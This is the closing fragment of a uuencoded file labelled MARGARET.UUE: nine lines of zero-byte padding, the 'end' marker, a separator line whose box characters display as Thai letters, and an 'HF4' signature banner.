M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
5````````````````````````````
`
end
 
 ฤฤ MARGARET.UUE ENDS HERE ฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤ 
 
 
                                   
                               -=<{[* HF4 *]}>=-

